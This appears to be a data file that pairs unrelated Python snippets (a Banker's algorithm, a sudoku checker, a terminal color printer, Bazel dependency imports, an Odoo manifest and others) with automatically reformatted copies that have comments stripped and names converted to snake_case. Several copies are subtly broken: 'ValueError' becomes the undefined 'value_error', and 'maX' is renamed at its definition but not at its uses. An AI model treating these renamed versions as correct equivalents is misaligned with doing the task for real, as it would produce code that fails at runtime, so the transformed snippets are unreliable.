""" [8/10/2014] Challenge #174 [Extra] Functional Thinking https://www.reddit.com/r/dailyprogrammer/comments/2d52d8/8102014_challenge_174_extra_functional_thinking/ # *(Extra)*: Functional Thinking I'm trying a new bonus challenge today with any theme I can think of, such as rewriting an existing solution using a different paradigm or with a limitation on how you can write it. I'm going to see how this is received and may or may not make this a recurring thing. I will be writing these to primarily be a learning exercise - both for me and for you, the readers of /r/DailyProgrammer - so if you are interested in learning about new languages, new ways of writing solutions or modern programming in general then this may be of interest for you. For today, though, you are to rewrite a solution (that you've wrote) to *any* previous challenge (and as many as you want to), in a functional programming language. If you're new to functional programming languages, like I am, it's a paradigm of programming that treats a program as an evaluation of functions only, avoiding variables. Everything is treated as a function, and programs written in such a language are designed and look substantially different to one written in an imperative language such as Python, Java or Ruby. There are a boat load of languages you can choose from. One of the popular ones on /r/DailyProgrammer is [Haskell](http://en.wikipedia.org/wiki/Haskell_%28programming_language%29). There is the Lisp family (including [Common Lisp](http://en.wikipedia.org/wiki/Common_Lisp), [Scheme](http://en.wikipedia.org/wiki/Scheme_(programming_language) and [Clojure](http://en.wikipedia.org/wiki/Clojure)). [R](http://en.wikipedia.org/wiki/R_%28programming_language%29) is also debatably a functional language, or at least can be used as one. There are others too. Pick one you like and rewrite one of your existing solutions in it. Do you use Haskell or something already? Rewrite it in a new functional language! They're all different in some way or another. I'm trying to learn Clojure at the moment myself so I'll be submitting some of my own solutions. ## Post Format When you post your solution, please give the name (and the link) to the challenge which the solution is for. """ def main(): pass if __name__ == "__main__": main()
""" [8/10/2014] Challenge #174 [Extra] Functional Thinking https://www.reddit.com/r/dailyprogrammer/comments/2d52d8/8102014_challenge_174_extra_functional_thinking/ # *(Extra)*: Functional Thinking I'm trying a new bonus challenge today with any theme I can think of, such as rewriting an existing solution using a different paradigm or with a limitation on how you can write it. I'm going to see how this is received and may or may not make this a recurring thing. I will be writing these to primarily be a learning exercise - both for me and for you, the readers of /r/DailyProgrammer - so if you are interested in learning about new languages, new ways of writing solutions or modern programming in general then this may be of interest for you. For today, though, you are to rewrite a solution (that you've wrote) to *any* previous challenge (and as many as you want to), in a functional programming language. If you're new to functional programming languages, like I am, it's a paradigm of programming that treats a program as an evaluation of functions only, avoiding variables. Everything is treated as a function, and programs written in such a language are designed and look substantially different to one written in an imperative language such as Python, Java or Ruby. There are a boat load of languages you can choose from. One of the popular ones on /r/DailyProgrammer is [Haskell](http://en.wikipedia.org/wiki/Haskell_%28programming_language%29). There is the Lisp family (including [Common Lisp](http://en.wikipedia.org/wiki/Common_Lisp), [Scheme](http://en.wikipedia.org/wiki/Scheme_(programming_language) and [Clojure](http://en.wikipedia.org/wiki/Clojure)). [R](http://en.wikipedia.org/wiki/R_%28programming_language%29) is also debatably a functional language, or at least can be used as one. There are others too. Pick one you like and rewrite one of your existing solutions in it. Do you use Haskell or something already? Rewrite it in a new functional language! They're all different in some way or another. I'm trying to learn Clojure at the moment myself so I'll be submitting some of my own solutions. ## Post Format When you post your solution, please give the name (and the link) to the challenge which the solution is for. """ def main(): pass if __name__ == '__main__': main()
def to_list(string): list_str = [] for tok in string: list_str.append(tok) return list_str def to_string(list): string_list = "" for item in list: string_list += item return string_list def fst_op(program): raw = "" for item in program: if item == "(": break else: raw += item return raw def break_down(ops): raw = [""] quote_mode = 0 ind = 0 for i in range(len(ops)): # Read the quote if ops[i] == "(" : quote_mode += 1 if ops[i] == ")" : quote_mode -= 1 # Decompose if ops[i] == "[": quote_mode += 1 if ops[i] == "]": quote_mode -= 1 if ops[i] == "," and quote_mode == 0: ind += 1 raw.append("") else: raw[ind] += ops[i] return raw def de_layer(p): p = to_list(p) for i in range(len(p)): if p[i] == "(": p[i] = "" p[-1] = "" break else: p[i] = "" return to_string(p) def Decompose(p): sequence = [] p = p def decompose(p): ops = break_down(p) for op in ops: sequence.append(fst_op(op)) # Check if it can be decompose again if "(" in op: delayered = de_layer(op) arguments = break_down(delayered) for arg in arguments: decompose(arg) decompose(p) return sequence
def to_list(string): list_str = [] for tok in string: list_str.append(tok) return list_str def to_string(list): string_list = '' for item in list: string_list += item return string_list def fst_op(program): raw = '' for item in program: if item == '(': break else: raw += item return raw def break_down(ops): raw = [''] quote_mode = 0 ind = 0 for i in range(len(ops)): if ops[i] == '(': quote_mode += 1 if ops[i] == ')': quote_mode -= 1 if ops[i] == '[': quote_mode += 1 if ops[i] == ']': quote_mode -= 1 if ops[i] == ',' and quote_mode == 0: ind += 1 raw.append('') else: raw[ind] += ops[i] return raw def de_layer(p): p = to_list(p) for i in range(len(p)): if p[i] == '(': p[i] = '' p[-1] = '' break else: p[i] = '' return to_string(p) def decompose(p): sequence = [] p = p def decompose(p): ops = break_down(p) for op in ops: sequence.append(fst_op(op)) if '(' in op: delayered = de_layer(op) arguments = break_down(delayered) for arg in arguments: decompose(arg) decompose(p) return sequence
""" Routine to perform color printing of text, wrapping standard pyton print function. """ # ANSI terminal colors - just put in as part of the string to get color terminal output colors = {'red': '\x1b[31m', 'r': '\x1b[31m', 'orange': '\x1b[48:5:208:0m', 'o': '\x1b[48:5:208:0m', 'yellow': '\x1b[33m', 'y': '\x1b[33m', 'green': '\x1b[32m', 'g': '\x1b[32m', 'magenta': '\x1b[35m', 'm': '\x1b[35m', 'blue': '\x1b[34m', 'b': '\x1b[34m', 'cyan': '\x1b[36m' , 'c': '\x1b[36m' , 'white': '\x1b[0m', 'w': '\x1b[0m', 'backgray': '\x1b[100m'} def cprint(c, txt, default='white', **kwds): r""" color print: one line Parameters ---------- c : string color, one of [red, yellow, green, magenta, blue, cyan, white, backgray] txt : string text string to print out default: str (default: white) default color to return to after printing \**kwds: Keywords to pass to the print statement (such as end='') """ if c not in list(colors.keys()): raise ValueError(f'cprint: color {c:s} is not in valid list of colors') if not isinstance(txt, str): txt = str(txt) print(f"{colors[c]:s}{txt:s}{colors[default]:s}", **kwds)
""" Routine to perform color printing of text, wrapping standard pyton print function. """ colors = {'red': '\x1b[31m', 'r': '\x1b[31m', 'orange': '\x1b[48:5:208:0m', 'o': '\x1b[48:5:208:0m', 'yellow': '\x1b[33m', 'y': '\x1b[33m', 'green': '\x1b[32m', 'g': '\x1b[32m', 'magenta': '\x1b[35m', 'm': '\x1b[35m', 'blue': '\x1b[34m', 'b': '\x1b[34m', 'cyan': '\x1b[36m', 'c': '\x1b[36m', 'white': '\x1b[0m', 'w': '\x1b[0m', 'backgray': '\x1b[100m'} def cprint(c, txt, default='white', **kwds): """ color print: one line Parameters ---------- c : string color, one of [red, yellow, green, magenta, blue, cyan, white, backgray] txt : string text string to print out default: str (default: white) default color to return to after printing \\**kwds: Keywords to pass to the print statement (such as end='') """ if c not in list(colors.keys()): raise value_error(f'cprint: color {c:s} is not in valid list of colors') if not isinstance(txt, str): txt = str(txt) print(f'{colors[c]:s}{txt:s}{colors[default]:s}', **kwds)
# automatically generated by the FlatBuffers compiler, do not modify # namespace: aghast_generated class InterpretedBuffer(object): NONE = 0 InterpretedInlineBuffer = 1 InterpretedInlineInt64Buffer = 2 InterpretedInlineFloat64Buffer = 3 InterpretedExternalBuffer = 4
class Interpretedbuffer(object): none = 0 interpreted_inline_buffer = 1 interpreted_inline_int64_buffer = 2 interpreted_inline_float64_buffer = 3 interpreted_external_buffer = 4
# https://docs.python.org/3/faq/programming.html#how-do-i-share-global-variables-across-modules crLog = None environment_config = None magic_value_config = None message_config = None
cr_log = None environment_config = None magic_value_config = None message_config = None
class Menu: def __init__(self, position=(0, 0)): """ Make all menu mechanics :param position: start position for drawing """ self.index = 0 self.x = position[0] self.y = position[1] self.menu = list() def down(self): """ Move menu pointer down :return: None """ self.index += 1 if self.index >= len(self.menu): self.index = 0 def up(self): """ Move menu pointer up :return: None """ self.index -= 1 if self.index < 0: self.index = len(self.menu) - 1 def add_menu_item(self, no_select, select, func): """ Insert new menu item :param no_select: function invoked when a menu item isn't selected :param select: function invoked when menu item is selected :param func: function invoked when menu item is clicked :return: None """ self.menu.append({'no select': no_select, 'select': select, 'func': func}) def call(self): """ Invoke function from menu item :return: None """ self.menu[self.index]['func']() def draw(self, display): """ Draw menu on display :param display: place to put menu items :return: None """ index = 0 x = self.x y = self.y for item in self.menu: if self.index == index: display.blit(item['select'], (x, y)) y += item['select'].get_rect().h else: display.blit(item['no select'], (x, y)) y += item['no select'].get_rect().h index += 1
class Menu: def __init__(self, position=(0, 0)): """ Make all menu mechanics :param position: start position for drawing """ self.index = 0 self.x = position[0] self.y = position[1] self.menu = list() def down(self): """ Move menu pointer down :return: None """ self.index += 1 if self.index >= len(self.menu): self.index = 0 def up(self): """ Move menu pointer up :return: None """ self.index -= 1 if self.index < 0: self.index = len(self.menu) - 1 def add_menu_item(self, no_select, select, func): """ Insert new menu item :param no_select: function invoked when a menu item isn't selected :param select: function invoked when menu item is selected :param func: function invoked when menu item is clicked :return: None """ self.menu.append({'no select': no_select, 'select': select, 'func': func}) def call(self): """ Invoke function from menu item :return: None """ self.menu[self.index]['func']() def draw(self, display): """ Draw menu on display :param display: place to put menu items :return: None """ index = 0 x = self.x y = self.y for item in self.menu: if self.index == index: display.blit(item['select'], (x, y)) y += item['select'].get_rect().h else: display.blit(item['no select'], (x, y)) y += item['no select'].get_rect().h index += 1
""" Session: 8 Topic: Set vs List """ # my_set = {1, 2, 3, 1, 2} my_set = {"apple", "apple", "orange", "orange", "orange"} print(my_set) print ("\n\n") # my_list = [1, 2, 3, 1, 2] my_list = ["apple", "apple", "orange", "orange", "orange"] print(my_list)
""" Session: 8 Topic: Set vs List """ my_set = {'apple', 'apple', 'orange', 'orange', 'orange'} print(my_set) print('\n\n') my_list = ['apple', 'apple', 'orange', 'orange', 'orange'] print(my_list)
def check(i): for j in range(m): if need[i][j] > available[j]: return False return True n = int(input("Enter the number of Processes: ")) m = int(input("Enter the number of Resources: ")) allocation = [] for i in range(n): allocation.append(list(map(int, input('\nEnter the number of instances allocated for Process P'+str(i)+" : ").strip().split()))) maX = [] for i in range(n): maX.append(list(map(int, input("\nEnter Max matrix entry for Process P"+str(i)+" : ").strip().split()))) available = list(map(int, input("\nEnter the number of instances available of Resources : ").strip().split())) # Compute the need matrix need = [[0 for i in range(m)] for j in range(n)] for i in range(n): for j in range(m): need[i][j] = maX[i][j] - allocation[i][j] # Implements Banker's Algorithm sequence = ['0']*n visited = [0]*n count = 0 while count<n: safe = False for i in range(n): if visited[i]==0 and check(i): sequence[count] = "P" + str(i) count += 1 visited[i] = 1 safe = True for j in range(m): available[j] += allocation[i][j] if not safe: break if (count<n): print("The System is Unsafe!") else: print() print("The System is Safe!") print("Safe Sequence is", sequence) print("Available resource is", available)
def check(i): for j in range(m): if need[i][j] > available[j]: return False return True n = int(input('Enter the number of Processes: ')) m = int(input('Enter the number of Resources: ')) allocation = [] for i in range(n): allocation.append(list(map(int, input('\nEnter the number of instances allocated for Process P' + str(i) + ' : ').strip().split()))) ma_x = [] for i in range(n): maX.append(list(map(int, input('\nEnter Max matrix entry for Process P' + str(i) + ' : ').strip().split()))) available = list(map(int, input('\nEnter the number of instances available of Resources : ').strip().split())) need = [[0 for i in range(m)] for j in range(n)] for i in range(n): for j in range(m): need[i][j] = maX[i][j] - allocation[i][j] sequence = ['0'] * n visited = [0] * n count = 0 while count < n: safe = False for i in range(n): if visited[i] == 0 and check(i): sequence[count] = 'P' + str(i) count += 1 visited[i] = 1 safe = True for j in range(m): available[j] += allocation[i][j] if not safe: break if count < n: print('The System is Unsafe!') else: print() print('The System is Safe!') print('Safe Sequence is', sequence) print('Available resource is', available)
#web scraping - open the html file #then find the appropriate chunk of code like <table> where your data is #then extract what you want from there """ For APIs, they'll help you scrape the webpage more easily based on the documentation provided by the webpage, if any. So you can look for APIs from various websites, so you don't have to manually go into the html webpage to find the correct class etc """
""" For APIs, they'll help you scrape the webpage more easily based on the documentation provided by the webpage, if any. So you can look for APIs from various websites, so you don't have to manually go into the html webpage to find the correct class etc """
RESOLVER_STORE = {"pulumi.json": {"Any": {"type": "any"}, "Asset": {"type": "string"}}} PULUMI_ID = "id" PULUMI_NS = "pulumi" PULUMI_HOME_ENV = "PULUMI_HOME"
resolver_store = {'pulumi.json': {'Any': {'type': 'any'}, 'Asset': {'type': 'string'}}} pulumi_id = 'id' pulumi_ns = 'pulumi' pulumi_home_env = 'PULUMI_HOME'
def is_in_range(digits, r_max): number = 0 for i, d in enumerate(digits): number += d * 10**i if number > r_max: return False # print(number) return True def is_valid(digits): distinct_digits = list(set(digits)) for dd in distinct_digits: if digits.count(dd) == 2: return True return False def solve(r_min, r_max): # Count number in the range [r_min, r_max] which follow these rules: # - going from left to right, the digits never decrease # - at least two adjacent digits are the same digits = [] while r_min > 0: digits.append(r_min % 10) r_min //= 10 # find smallest number that works idx = 0 while idx < len(digits) - 1: if digits[idx] < digits[idx + 1]: digits[idx] = digits[idx + 1] idx = 0 else: idx += 1 # Compute numbers cnt = 0 idx = 0 while is_in_range(digits, r_max): if is_valid(digits): cnt += 1 if digits[idx] != 9: digits[idx] += 1 continue while digits[idx] == 9: idx += 1 digits[idx] += 1 for i in range(0, idx): digits[i] = digits[idx] idx = 0 return cnt if __name__ == '__main__': range_min, range_max = 136760, 595730 solution = solve(range_min, range_max) print(f'There are {solution} different passwords.')
def is_in_range(digits, r_max): number = 0 for (i, d) in enumerate(digits): number += d * 10 ** i if number > r_max: return False return True def is_valid(digits): distinct_digits = list(set(digits)) for dd in distinct_digits: if digits.count(dd) == 2: return True return False def solve(r_min, r_max): digits = [] while r_min > 0: digits.append(r_min % 10) r_min //= 10 idx = 0 while idx < len(digits) - 1: if digits[idx] < digits[idx + 1]: digits[idx] = digits[idx + 1] idx = 0 else: idx += 1 cnt = 0 idx = 0 while is_in_range(digits, r_max): if is_valid(digits): cnt += 1 if digits[idx] != 9: digits[idx] += 1 continue while digits[idx] == 9: idx += 1 digits[idx] += 1 for i in range(0, idx): digits[i] = digits[idx] idx = 0 return cnt if __name__ == '__main__': (range_min, range_max) = (136760, 595730) solution = solve(range_min, range_max) print(f'There are {solution} different passwords.')
def analysis(filename): file = open(filename) total = [] for entry in file: info = entry.split(' ') total.append(info) total.sort(key = lambda x: int(x[1][:-1]),reverse=True) # print(total[:1000]) final_analysis = open('final_analysis.txt','w') for entry in total: final_analysis.write(' '.join(entry)) final_analysis.close() filename = 'analysis.txt' analysis(filename)
def analysis(filename): file = open(filename) total = [] for entry in file: info = entry.split(' ') total.append(info) total.sort(key=lambda x: int(x[1][:-1]), reverse=True) final_analysis = open('final_analysis.txt', 'w') for entry in total: final_analysis.write(' '.join(entry)) final_analysis.close() filename = 'analysis.txt' analysis(filename)
def sudoku(grid): match = [i for i in range(1, 10)] for row in grid: if sorted(row) != match: return False for column_index in range(9): column = [grid[row_index][column_index] for row_index in range(9)] if sorted(column) != match: return False for row in range(0, 9, 3): for column in range(0, 9, 3): box = [] box.extend(grid[row][column : column + 3]) box.extend(grid[row + 1][column : column + 3]) box.extend(grid[row + 2][column : column + 3]) if sorted(box) != match: return False return True
def sudoku(grid): match = [i for i in range(1, 10)] for row in grid: if sorted(row) != match: return False for column_index in range(9): column = [grid[row_index][column_index] for row_index in range(9)] if sorted(column) != match: return False for row in range(0, 9, 3): for column in range(0, 9, 3): box = [] box.extend(grid[row][column:column + 3]) box.extend(grid[row + 1][column:column + 3]) box.extend(grid[row + 2][column:column + 3]) if sorted(box) != match: return False return True
# -*- coding: utf-8 -*- """ Created on Sat Dec 21 18:38:37 2019 @author: NOTEBOOK """ #This program displays the total earnings of a worker over a number of days in dollars # starting from 1 penny and doubling each day def main(): #Get number of days days = int(input('Enter number of days: ' )) #Print Headers print('Days\tEarnings') print('---------------------') #Initialize first earning starter = 1.0 #initialize acummulator total = 0.0 for num in range(days): #Calculate and display earnings earnings = starter * (2 ** (num)) print('Day',num + 1,'\t', earnings) total += earnings dollar_earnings = total / 100 print('---------------------') print('total earnings in dollars is $',format(dollar_earnings,',.2f'), sep ='') main()
""" Created on Sat Dec 21 18:38:37 2019 @author: NOTEBOOK """ def main(): days = int(input('Enter number of days: ')) print('Days\tEarnings') print('---------------------') starter = 1.0 total = 0.0 for num in range(days): earnings = starter * 2 ** num print('Day', num + 1, '\t', earnings) total += earnings dollar_earnings = total / 100 print('---------------------') print('total earnings in dollars is $', format(dollar_earnings, ',.2f'), sep='') main()
## Verifica Palavra no Nome nome = str(input('Qual seu nome completo? ')).strip() print('Seu nome tem Silva? {}'.format('SILVA' in nome.upper())) ## Concatenando Strings print('-='*30) print('CONCATENANDO STRINGS') print('-='*30) a = 'Wollacy' b = 'Lilian' c = 'Augusto' print(a) print(b) print(c) d = a + ' + ' + b + ' = ' + c print(d)
nome = str(input('Qual seu nome completo? ')).strip() print('Seu nome tem Silva? {}'.format('SILVA' in nome.upper())) print('-=' * 30) print('CONCATENANDO STRINGS') print('-=' * 30) a = 'Wollacy' b = 'Lilian' c = 'Augusto' print(a) print(b) print(c) d = a + ' + ' + b + ' = ' + c print(d)
syntax = r'^\+(?:tel|port|teleport)(?P<quiet>/quiet)? (?P<target>.+)$' def teleport(caller, target, quiet=False, force=False): target = search(caller, target).all() if not target: commands.pemit(caller, caller, "\c(red)!!! Unable to find target.") return target = target[0] if target is caller.character.location: commands.pemit(caller, caller, "\c(red)!!! You can not teleport to your current location.") return if not force and 'lock' in target.flags and target.properties['owner'] != caller.character.id: # and 'staff' not in user.groups: commands.pemit(caller, caller, "\c(red)!!! You can not teleport into a locked room unless you own it or are a member of staff.") return if not quiet: recipients = search(caller, within=caller.character.location, not_within=[caller.character], kind=db.Character, flags=['!deaf']) commands.pemit(caller, recipients, '%N has left the room.') target.attach(caller.character) if not quiet: recipients = search(caller, within=caller.character.location, not_within=[caller.character], kind=db.Character, flags=['!deaf']) commands.pemit(caller, recipients, '%N has entered the room.') commands.look(caller) teleport.safe = True teleport.complete = False teleport.notes = [ ('cuttlefish', 'todo', 'Need to use global "otel" property as teleport notification message.'), ('cuttlefish', 'todo', 'Need to perform staff group check.') ]
syntax = '^\\+(?:tel|port|teleport)(?P<quiet>/quiet)? (?P<target>.+)$' def teleport(caller, target, quiet=False, force=False): target = search(caller, target).all() if not target: commands.pemit(caller, caller, '\\c(red)!!! Unable to find target.') return target = target[0] if target is caller.character.location: commands.pemit(caller, caller, '\\c(red)!!! You can not teleport to your current location.') return if not force and 'lock' in target.flags and (target.properties['owner'] != caller.character.id): commands.pemit(caller, caller, '\\c(red)!!! You can not teleport into a locked room unless you own it or are a member of staff.') return if not quiet: recipients = search(caller, within=caller.character.location, not_within=[caller.character], kind=db.Character, flags=['!deaf']) commands.pemit(caller, recipients, '%N has left the room.') target.attach(caller.character) if not quiet: recipients = search(caller, within=caller.character.location, not_within=[caller.character], kind=db.Character, flags=['!deaf']) commands.pemit(caller, recipients, '%N has entered the room.') commands.look(caller) teleport.safe = True teleport.complete = False teleport.notes = [('cuttlefish', 'todo', 'Need to use global "otel" property as teleport notification message.'), ('cuttlefish', 'todo', 'Need to perform staff group check.')]
load("@rules_maven_third_party//:import_external.bzl", import_external = "import_external") def dependencies(): import_external( name = "org_codehaus_plexus_plexus_archiver", artifact = "org.codehaus.plexus:plexus-archiver:3.4", artifact_sha256 = "3c6611c98547dbf3f5125848c273ba719bc10df44e3f492fa2e302d6135a6ea5", srcjar_sha256 = "1887e8269928079236c9e1a75af5b5e256f4bfafaaed18da5c9c84faf5b26a91", deps = [ "@commons_io_commons_io", "@org_apache_commons_commons_compress", "@org_codehaus_plexus_plexus_io", "@org_codehaus_plexus_plexus_utils", "@org_iq80_snappy_snappy", ], runtime_deps = [ "@org_tukaani_xz", ], ) import_external( name = "org_codehaus_plexus_plexus_component_annotations", artifact = "org.codehaus.plexus:plexus-component-annotations:1.7.1", artifact_sha256 = "a7fee9435db716bff593e9fb5622bcf9f25e527196485929b0cd4065c43e61df", srcjar_sha256 = "18999359e8c1c5eb1f17a06093ceffc21f84b62b4ee0d9ab82f2e10d11049a78", excludes = [ "junit:junit", ], ) import_external( name = "org_codehaus_plexus_plexus_container_default", artifact = "org.codehaus.plexus:plexus-container-default:1.0-alpha-9-stable-1", artifact_sha256 = "7c758612888782ccfe376823aee7cdcc7e0cdafb097f7ef50295a0b0c3a16edf", srcjar_sha256 = "330e1bf490259c64fd6b27097adb8d41159500f849743b8680f3515044483d62", deps = [ "@classworlds_classworlds", "@junit_junit", "@org_codehaus_plexus_plexus_utils", ], ) import_external( name = "org_codehaus_plexus_plexus_interactivity_api", artifact = "org.codehaus.plexus:plexus-interactivity-api:1.0-alpha-4", artifact_sha256 = "4f60eb379f93d8b616bc3b4d299f466bc54fcced959f7ad082dae78b89d6a3f0", srcjar_sha256 = "2eae2dc145b8dca70671f4607255b5419b6609741c753b925debcef598d56206", deps = [ "@classworlds_classworlds", ], excludes = [ "org.codehaus.plexus:plexus-container-default", "plexus:plexus-utils", ], ) import_external( name = "org_codehaus_plexus_plexus_interpolation", artifact = "org.codehaus.plexus:plexus-interpolation:1.11", artifact_sha256 = "fd9507feb858fa620d1b4aa4b7039fdea1a77e09d3fd28cfbddfff468d9d8c28", srcjar_sha256 = "92e960ff19db5b1f8cd399d20bd52c2dd3c81c080029f2a9b7c77e077d0b0d83", ) import_external( name = "org_codehaus_plexus_plexus_io", artifact = "org.codehaus.plexus:plexus-io:2.7.1", artifact_sha256 = "20aa9dd74536ad9ce65d1253b5c4386747483a7a65c48008c9affb51854539cf", deps = [ "@commons_io_commons_io", "@org_codehaus_plexus_plexus_utils", ], ) import_external( name = "org_codehaus_plexus_plexus_utils", artifact = "org.codehaus.plexus:plexus-utils:3.0.24", artifact_sha256 = "83ee748b12d06afb0ad4050a591132b3e8025fbb1990f1ed002e8b73293e69b4", srcjar_sha256 = "ec01853bc765eddc0accf19993482c14ab0aa59dccec4efd361ef23649153935", ) import_external( name = "org_codehaus_plexus_plexus_velocity", artifact = "org.codehaus.plexus:plexus-velocity:1.1.8", artifact_sha256 = "36b3ea3d0cef03f36bd2c4e0f34729c3de80fd375059bdccbf52b10a42c6ec2c", srcjar_sha256 = "906065102c989b1a82ab0871de1489381835af84cdb32c668c8af59d8a7767fe", deps = [ "@commons_collections_commons_collections", "@org_codehaus_plexus_plexus_container_default", ], excludes = [ "velocity:velocity", "velocity:velocity-api", ], )
load('@rules_maven_third_party//:import_external.bzl', import_external='import_external') def dependencies(): import_external(name='org_codehaus_plexus_plexus_archiver', artifact='org.codehaus.plexus:plexus-archiver:3.4', artifact_sha256='3c6611c98547dbf3f5125848c273ba719bc10df44e3f492fa2e302d6135a6ea5', srcjar_sha256='1887e8269928079236c9e1a75af5b5e256f4bfafaaed18da5c9c84faf5b26a91', deps=['@commons_io_commons_io', '@org_apache_commons_commons_compress', '@org_codehaus_plexus_plexus_io', '@org_codehaus_plexus_plexus_utils', '@org_iq80_snappy_snappy'], runtime_deps=['@org_tukaani_xz']) import_external(name='org_codehaus_plexus_plexus_component_annotations', artifact='org.codehaus.plexus:plexus-component-annotations:1.7.1', artifact_sha256='a7fee9435db716bff593e9fb5622bcf9f25e527196485929b0cd4065c43e61df', srcjar_sha256='18999359e8c1c5eb1f17a06093ceffc21f84b62b4ee0d9ab82f2e10d11049a78', excludes=['junit:junit']) import_external(name='org_codehaus_plexus_plexus_container_default', artifact='org.codehaus.plexus:plexus-container-default:1.0-alpha-9-stable-1', artifact_sha256='7c758612888782ccfe376823aee7cdcc7e0cdafb097f7ef50295a0b0c3a16edf', srcjar_sha256='330e1bf490259c64fd6b27097adb8d41159500f849743b8680f3515044483d62', deps=['@classworlds_classworlds', '@junit_junit', '@org_codehaus_plexus_plexus_utils']) import_external(name='org_codehaus_plexus_plexus_interactivity_api', artifact='org.codehaus.plexus:plexus-interactivity-api:1.0-alpha-4', artifact_sha256='4f60eb379f93d8b616bc3b4d299f466bc54fcced959f7ad082dae78b89d6a3f0', srcjar_sha256='2eae2dc145b8dca70671f4607255b5419b6609741c753b925debcef598d56206', deps=['@classworlds_classworlds'], excludes=['org.codehaus.plexus:plexus-container-default', 'plexus:plexus-utils']) import_external(name='org_codehaus_plexus_plexus_interpolation', artifact='org.codehaus.plexus:plexus-interpolation:1.11', artifact_sha256='fd9507feb858fa620d1b4aa4b7039fdea1a77e09d3fd28cfbddfff468d9d8c28', srcjar_sha256='92e960ff19db5b1f8cd399d20bd52c2dd3c81c080029f2a9b7c77e077d0b0d83') import_external(name='org_codehaus_plexus_plexus_io', artifact='org.codehaus.plexus:plexus-io:2.7.1', artifact_sha256='20aa9dd74536ad9ce65d1253b5c4386747483a7a65c48008c9affb51854539cf', deps=['@commons_io_commons_io', '@org_codehaus_plexus_plexus_utils']) import_external(name='org_codehaus_plexus_plexus_utils', artifact='org.codehaus.plexus:plexus-utils:3.0.24', artifact_sha256='83ee748b12d06afb0ad4050a591132b3e8025fbb1990f1ed002e8b73293e69b4', srcjar_sha256='ec01853bc765eddc0accf19993482c14ab0aa59dccec4efd361ef23649153935') import_external(name='org_codehaus_plexus_plexus_velocity', artifact='org.codehaus.plexus:plexus-velocity:1.1.8', artifact_sha256='36b3ea3d0cef03f36bd2c4e0f34729c3de80fd375059bdccbf52b10a42c6ec2c', srcjar_sha256='906065102c989b1a82ab0871de1489381835af84cdb32c668c8af59d8a7767fe', deps=['@commons_collections_commons_collections', '@org_codehaus_plexus_plexus_container_default'], excludes=['velocity:velocity', 'velocity:velocity-api'])
# 1. Decoration def deco(param): def wrapper(func): def inner_wrapper(*arg, **kwargs): print(param, arg, kwargs) inner_res = func(*arg, **kwargs) return inner_res return inner_wrapper return wrapper @deco(param="do what you want to do") def origin(times, add, sub, num=1): return times*(num + add) - sub if __name__ == '__main__': print("\033[1;30;m# 1. Decoration\033[0m") result = origin(1, 1, 0, num=5) print("result =", result) # 2. String Template .format() if __name__ == '__main__': print("\033[1;30;m# 2. String Template .format()\033[0m") for i in range(1, 10): for j in range(1, i+1): val = "{0}*{1}={2: >2}".format(j, i, i*j) print(val, end='\t') print()
def deco(param): def wrapper(func): def inner_wrapper(*arg, **kwargs): print(param, arg, kwargs) inner_res = func(*arg, **kwargs) return inner_res return inner_wrapper return wrapper @deco(param='do what you want to do') def origin(times, add, sub, num=1): return times * (num + add) - sub if __name__ == '__main__': print('\x1b[1;30;m# 1. Decoration\x1b[0m') result = origin(1, 1, 0, num=5) print('result =', result) if __name__ == '__main__': print('\x1b[1;30;m# 2. String Template .format()\x1b[0m') for i in range(1, 10): for j in range(1, i + 1): val = '{0}*{1}={2: >2}'.format(j, i, i * j) print(val, end='\t') print()
""" Analyze the grades of the students. Here's an example of the data .. code-block:: 111111004 5.0 5.0 6.0 111111005 3.75 3.0 4.0 111111006 4.5 2.25 4.0 Every line represents a grading of a student. It starts with her matriculation number, followed by space-delimited grades (between 1.0 and 6.0, floats). The grades correspond to lectures 1, 2 and 3, respectively. Provide the function ``critical`` which accepts two arguments, ``bound1`` and ``bound2``. The function lists all the students which have "critical" grades. A student should appear only once in the list. A student is "critical" if the grade for the first lecture is smaller-equal ``bound1`` and the sum of the grades for the lecture 2 and 3 is smaller than ``bound2``. On the above example, ``critical(4, 8)`` gives: .. code-block:: 111111005 Provide the function ``top`` which lists the students with the best grades. The parameter ``limit`` determines the number of the "top" students. If the number of students is less than ``limit``, return the list of all the students. A student should appear only once in the resulting list. The students are compared based on the sum of the grades in all the three lectures. If the sum of grades is equal for two students, the order in the list is undefined (*i.e.* does not matter). On the above example, ``top(2)`` might return both the output: .. code-block:: 111111004 111111005 and: .. code-block:: 111111004 111111006 (Both outputs are valid.) The parameter ``limit`` is always greater than 0. Both ``bound1`` and ``bound2`` are expected in the range ``[0.0, 100.0]``. """
""" Analyze the grades of the students. Here's an example of the data .. code-block:: 111111004 5.0 5.0 6.0 111111005 3.75 3.0 4.0 111111006 4.5 2.25 4.0 Every line represents a grading of a student. It starts with her matriculation number, followed by space-delimited grades (between 1.0 and 6.0, floats). The grades correspond to lectures 1, 2 and 3, respectively. Provide the function ``critical`` which accepts two arguments, ``bound1`` and ``bound2``. The function lists all the students which have "critical" grades. A student should appear only once in the list. A student is "critical" if the grade for the first lecture is smaller-equal ``bound1`` and the sum of the grades for the lecture 2 and 3 is smaller than ``bound2``. On the above example, ``critical(4, 8)`` gives: .. code-block:: 111111005 Provide the function ``top`` which lists the students with the best grades. The parameter ``limit`` determines the number of the "top" students. If the number of students is less than ``limit``, return the list of all the students. A student should appear only once in the resulting list. The students are compared based on the sum of the grades in all the three lectures. If the sum of grades is equal for two students, the order in the list is undefined (*i.e.* does not matter). On the above example, ``top(2)`` might return both the output: .. code-block:: 111111004 111111005 and: .. code-block:: 111111004 111111006 (Both outputs are valid.) The parameter ``limit`` is always greater than 0. Both ``bound1`` and ``bound2`` are expected in the range ``[0.0, 100.0]``. """
# -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. { 'name': 'Recurring Documents', 'category': 'Extra Tools', 'description': """ Create recurring documents. =========================== This module allows to create new documents and add subscriptions on that document. e.g. To have an invoice generated automatically periodically: ------------------------------------------------------------- * Define a document type based on Invoice object * Define a subscription whose source document is the document defined as above. Specify the interval information and partner to be invoiced. """, 'depends': ['base'], 'data': [ 'security/ir.model.access.csv', 'views/subscription_view.xml' ], 'demo': ['data/subscription_demo.xml'], }
{'name': 'Recurring Documents', 'category': 'Extra Tools', 'description': '\nCreate recurring documents.\n===========================\n\nThis module allows to create new documents and add subscriptions on that document.\n\ne.g. To have an invoice generated automatically periodically:\n-------------------------------------------------------------\n * Define a document type based on Invoice object\n * Define a subscription whose source document is the document defined as\n above. Specify the interval information and partner to be invoiced.\n ', 'depends': ['base'], 'data': ['security/ir.model.access.csv', 'views/subscription_view.xml'], 'demo': ['data/subscription_demo.xml']}
